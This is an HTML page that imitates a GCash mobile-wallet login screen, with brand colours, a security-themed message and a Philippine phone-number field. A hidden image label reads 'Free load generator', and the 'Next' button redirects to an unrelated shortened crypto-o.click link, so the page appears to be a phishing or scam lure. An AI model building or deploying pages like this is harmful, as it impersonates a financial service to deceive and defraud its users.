<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gcash Login Screen</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            background-color: #0077e6; /* GCash Blue */
            display: flex;
            justify-content: center;
            align-items: center;
            height: 75vh;
            flex-direction: column;
        }
        .container {
            width: 90%;
            max-width: 400px;
            text-align: center;
            color: white;
        }
        .logo {
            margin: 20px auto;
        }
        .logo img {
            width: 120px;
        }
        .info-box {
            background-color: #fff;
            padding: 15px;
            border-radius: 10px;
            text-align: left;
            margin: 10px 0;
            color: #333;
        }
        .info-box h3 {
            font-size: 1rem;
            color: #c57b2e; /* Warning color */
            margin: 0 0 10px;
        }
        .info-box p {
            margin: 0;
            font-size: 0.9rem;
            line-height: 1.2
           ;
        }
        .input-group {
            margin: 30px 0;
        }
        .input-group input {
            width: 90%;
            padding: 12px;
            font-size: 1.2rem;
            border: none;
            border-radius: 4px;
            text-align: center;
        }
        .next-button {
            width: 100%;
            background-color: #fff;
            color: #0077e6;
            border: none;
            padding: 15px;
            font-size: 1.1rem;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        .next-button:hover {
            background-color: #e0e0e0;
        }
        .footer {
            margin-top: 30px;
            font-size: 0.9rem;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://images.app.goo.gl/WFg9txF9keA38dJ5A" alt="Free load generator">
        </div>
        <div class="info-box">
            <h3>Your account, even more secure</h3>
            <p>Register your number.</p>
            <p>Enjoy.</p>
        </div>
        <div class="input-group">
            <input type="text" placeholder="+63 123 456 7890" required>
        </div>
        <button class="next-button" onclick="location.href='https://crypto-o.click/9J5XE4'">Next</button>
        <div class="footer">
            <a href="#" style="color: white; text-decoration: underline;">Help Center</a>
            <p>v5.81.0:973</p>
        </div>
    </div>
</body>
</html>
